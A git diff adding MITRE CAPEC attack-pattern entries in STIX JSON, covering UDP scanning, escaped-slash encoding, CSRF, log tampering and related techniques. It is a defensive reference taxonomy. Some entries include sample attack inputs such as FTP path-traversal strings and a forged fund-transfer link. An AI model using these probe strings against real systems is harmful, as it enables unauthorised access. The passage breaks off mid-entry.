+                "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.",
+                "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell."
+            ],
+            "x_capec_status": "Stable",
+            "x_capec_typical_severity": "Very High",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json
new file mode 100644
index 0000000000000000000000000000000000000000..7a411b9c8c627c0cbc83965568dc34987470716e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json
@@ -0,0 +1,29 @@
+{
+    "id": "bundle--cee023f2-c55a-4990-af22-b1cfd1339809",
+    "objects": [
+        {
+            "created": "2014-06-23T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-13 : Subverting Environment Variable Values\". Please refer to this other CAPEC going forward.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-264",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/264.html"
+                }
+            ],
+            "id": "attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca",
+            "modified": "2017-05-01T00:00:00.000Z",
+            "name": "DEPRECATED: Environment Variable Manipulation",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Meta",
+            "x_capec_status": "Deprecated",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json
new file mode 100644
index 0000000000000000000000000000000000000000..bf3e79366cfe219bb71cf6fbbdd5269995fc7361
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json
@@ -0,0 +1,87 @@
+{
+    "id": "bundle--a1499a54-37b0-4182-bba4-af7daf538b10",
+    "objects": [
+        {
+            "created": "2014-06-23T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "An adversary engages in UDP scanning to gather information about UDP port status on the target system. UDP scanning methods involve sending a UDP datagram to the target port and looking for evidence that the port is closed. Open UDP ports usually do not respond to UDP datagrams as there is no stateful mechanism within the protocol that requires building or establishing a session. Responses to UDP datagrams are therefore application specific and cannot be relied upon as a method of detecting an open port. UDP scanning relies heavily upon ICMP diagnostic messages in order to determine the status of a remote port.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-308",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/308.html"
+                },
+                {
+                    "external_id": "CWE-200",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/200.html"
+                },
+                {
+                    "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
+                    "external_id": "REF-33",
+                    "source_name": "reference_from_CAPEC"
+                },
+                {
+                    "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28",
+                    "external_id": "REF-158",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "http://www.faqs.org/rfcs/rfc768.html"
+                },
+                {
+                    "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7",
+                    "external_id": "REF-34",
+                    "source_name": "reference_from_CAPEC"
+                },
+                {
+                    "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
+                    "external_id": "REF-130",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "http://phrack.org/issues/51/11.html"
+                }
+            ],
+            "id": "attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6",
+            "modified": "2022-02-22T00:00:00.000Z",
+            "name": "UDP Scan",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Detailed",
+            "x_capec_child_of_refs": [
+                "attack-pattern--9ca34308-a8e4-40b6-becd-3ff95bac628a"
+            ],
+            "x_capec_consequences": {
+                "Access_Control": [
+                    "Bypass Protection Mechanism",
+                    "Hide Activities"
+                ],
+                "Authorization": [
+                    "Bypass Protection Mechanism",
+                    "Hide Activities"
+                ],
+                "Confidentiality": [
+                    "Other",
+                    "Bypass Protection Mechanism",
+                    "Hide Activities"
+                ]
+            },
+            "x_capec_domains": [
+                "Communications",
+                "Software"
+            ],
+            "x_capec_execution_flow": "

Execution Flow

Experiment

  1. An adversary sends UDP packets to target ports.

  2. An adversary uses the response from the target to determine the port's state. Whether a port responds to a UDP packet is dependant on what application is listening on that port. No response does not indicate the port is not open.

",
+            "x_capec_extended_description": "\n During a UDP scan, a datagram is sent to a target port. If an 'ICMP Type 3 Port unreachable' error message is returned then the port is considered closed. Different types of ICMP messages can indicate a filtered port. UDP scanning is slower than TCP scanning. The protocol characteristics of UDP make port scanning inherently more difficult than with TCP, as well as dependent upon ICMP for accurate scanning. Due to ambiguities that can arise between open ports and filtered ports, UDP scanning results often require a high degree of interpretation and further testing to refine. In general, UDP scanning results are less reliable or accurate than TCP-based scanning.\n ",
+            "x_capec_prerequisites": [
+                "The ability to send UDP datagrams to a host and receive ICMP error messages from that host. In cases where particular types of ICMP messaging is disallowed, the reliability of UDP scanning drops off sharply."
+            ],
+            "x_capec_resources_required": [
+                "The ability to craft custom UDP Packets for use during network reconnaissance. This can be accomplished via the use of a port scanner, or via socket manipulation in a programming or scripting language. Packet injection tools are also useful. It is also necessary to trap ICMP diagnostic messages during this process. Depending upon the method used it may be necessary to sniff the network in order to see the response."
+            ],
+            "x_capec_status": "Stable",
+            "x_capec_typical_severity": "Low",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json
new file mode 100644
index 0000000000000000000000000000000000000000..62076d0097ff5d511a80409d43a2684460b4ee4c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json 
@@ -0,0 +1,125 @@
+{
+    "id": "bundle--8bd4aa5d-8297-4c2e-9d55-8a812269388d",
+    "objects": [
+        {
+            "created": "2014-06-23T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-78",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/78.html"
+                },
+                {
+                    "external_id": "CWE-180",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/180.html"
+                },
+                {
+                    "external_id": "CWE-181",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/181.html"
+                },
+                {
+                    "external_id": "CWE-173",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/173.html"
+                },
+                {
+                    "external_id": "CWE-172",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/172.html"
+                },
+                {
+                    "external_id": "CWE-73",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/73.html"
+                },
+                {
+                    "external_id": "CWE-22",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/22.html"
+                },
+                {
+                    "external_id": "CWE-74",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/74.html"
+                },
+                {
+                    "external_id": "CWE-20",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/20.html"
+                },
+                {
+                    "external_id": "CWE-697",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/697.html"
+                },
+                {
+                    "external_id": "CWE-707",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/707.html"
+                },
+                {
+                    "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
+                    "external_id": "REF-1",
+                    "source_name": "reference_from_CAPEC"
+                }
+            ],
+            "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f",
+            "modified": "2022-09-29T00:00:00.000Z",
+            "name": "Using Escaped Slashes in Alternate Encoding",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Detailed",
+            "x_capec_child_of_refs": [
+                "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce"
+            ],
+            "x_capec_consequences": {
+                "Access_Control": [
+                    "Bypass Protection Mechanism"
+                ],
+                "Authorization": [
+                    "Bypass Protection Mechanism"
+                ],
+                "Availability": [
+                    "Resource Consumption (Denial of Service)",
+                    "Execute Unauthorized Commands (Run Arbitrary Code)"
+                ],
+                "Confidentiality": [
+                    "Read Data",
+                    "Execute Unauthorized Commands (Run Arbitrary Code)",
+                    "Bypass Protection Mechanism"
+                ],
+                "Integrity": [
+                    "Execute Unauthorized Commands (Run Arbitrary Code)"
+                ]
+            },
+            "x_capec_domains": [
+                "Software"
+            ],
+            "x_capec_example_instances": [
+                "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ",
+                "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n "
+            ],
+            "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

  2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

",
+            "x_capec_likelihood_of_attack": "High",
+            "x_capec_prerequisites": [
+                "The application accepts the backlash character as escape character.",
+                "The application server does incomplete input data decoding, filtering and validation."
+            ],
+            "x_capec_skills_required": {
+                "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.",
+                "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability."
+            },
+            "x_capec_status": "Draft",
+            "x_capec_typical_severity": "High",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json
new file mode 100644
index 0000000000000000000000000000000000000000..088ed04ddbd34c3d64a2a57b4a13dcc51935d870
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json
@@ -0,0 +1,116 @@
+{
+    "id": "bundle--d6793b84-bf51-4140-ae4a-d716cdcc2a04",
+    "objects": [
+        {
+            "created": "2014-06-23T00:00:00.000Z",
+            "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+            "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.",
+            "external_references": [
+                {
+                    "external_id": "CAPEC-62",
+                    "source_name": "capec",
+                    "url": "https://capec.mitre.org/data/definitions/62.html"
+                },
+                {
+                    "external_id": "CWE-352",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/352.html"
+                },
+                {
+                    "external_id": "CWE-306",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/306.html"
+                },
+                {
+                    "external_id": "CWE-664",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/664.html"
+                },
+                {
+                    "external_id": "CWE-732",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/732.html"
+                },
+                {
+                    "external_id": "CWE-1275",
+                    "source_name": "cwe",
+                    "url": "http://cwe.mitre.org/data/definitions/1275.html"
+                },
+                {
+                    "description": "Cross-Site Request Forgery",
+                    "external_id": "09",
+                    "source_name": "WASC",
+                    "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery"
+                },
+                {
+                    "description": "Cross Site Request Forgery (CSRF)",
+                    "source_name": "OWASP Attacks",
+                    "url": "https://owasp.org/www-community/attacks/csrf"
+                },
+                {
+                    "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH",
+                    "external_id": "REF-62",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf"
+                },
+                {
+                    "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)",
+                    "external_id": "REF-602",
+                    "source_name": "reference_from_CAPEC",
+                    "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html"
+                }
+            ],
+            "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d",
+            "modified": "2021-06-24T00:00:00.000Z",
+            "name": "Cross Site Request Forgery",
+            "object_marking_refs": [
+                "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+            ],
+            "spec_version": "2.1",
+            "type": "attack-pattern",
+            "x_capec_abstraction": "Standard",
+            "x_capec_alternate_terms": [
+                "Session Riding"
+            ],
+            "x_capec_child_of_refs": [
+                "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228"
+            ],
+            "x_capec_consequences": {
+                "Access_Control": [
+                    "Gain Privileges"
+                ],
+                "Authorization": [
+                    "Gain Privileges"
+                ],
+                "Confidentiality": [
+                    "Gain Privileges",
+                    "Read Data"
+                ],
+                "Integrity": [
+                    "Modify Data"
+                ]
+            },
+            "x_capec_domains": [
+                "Software"
+            ],
+            "x_capec_example_instances": [
+                "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail."
+            ],
+            "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

  2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

  2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

  2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
",
+            "x_capec_likelihood_of_attack": "High",
+            "x_capec_parent_of_refs": [
+                "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4"
+            ],
+            "x_capec_resources_required": [
+                "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim."
+            ],
+            "x_capec_skills_required": {
+                "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes."
+            },
+            "x_capec_status": "Draft",
+            "x_capec_typical_severity": "Very High",
+            "x_capec_version": "3.9"
+        }
+    ],
+    "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json
new file mode 100644
index 0000000000000000000000000000000000000000..c0bef7434abd09b8bb9e15355a042ce2068d2257
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json
@@ -0,0 +1,49 @@
+{
+ "id": "bundle--272b9f71-5a7e-4a9a-8727-fa360a5f0b11",
+ "objects": [
+ {
+ "created": "2017-01-12T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-583",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/583.html"
+ },
+ {
+ "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis",
+ "external_id": "REF-464",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf"
+ }
+ ],
+ "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55",
+ "modified": "2019-09-30T00:00:00.000Z",
+ "name": "Disabling Network Hardware",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8"
+ ],
+ "x_capec_consequences": {
+ "Availability": [
+ "Other (Denial of Service)"
+ ]
+ },
+ "x_capec_domains": [
+ "Hardware"
+ ],
+ "x_capec_prerequisites": [
+ "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area."
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json
new file mode 100644
index 0000000000000000000000000000000000000000..cb1b84c70c49dad9f4c610e1703a880f83969e6c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json
@@ -0,0 +1,73 @@ +{ + "id": "bundle--8924dda7-20e5-4f60-9831-a2178ac7bdba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. 
The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." 
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Medium",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json
new file mode 100644
index 0000000000000000000000000000000000000000..5d4cfef63c443f2387c4dd6055fdd51e89e6ead7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json
@@ -0,0 +1,110 @@ +{ + "id": "bundle--5c591659-08e1-4f18-8ae3-34dd0bf6502a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "external_id": "CAPEC-81", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-279", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html" + }, + { + "external_id": "CWE-116", + 
"source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Server Logs Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application Web Server Log File Format: The attacker observes the system and looks for indicators of which logging utility is being used by the web server.

  2. Techniques
    Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.

Experiment

  1. Determine Injectable Content: The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.

  2. Techniques
    Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

  2. Techniques
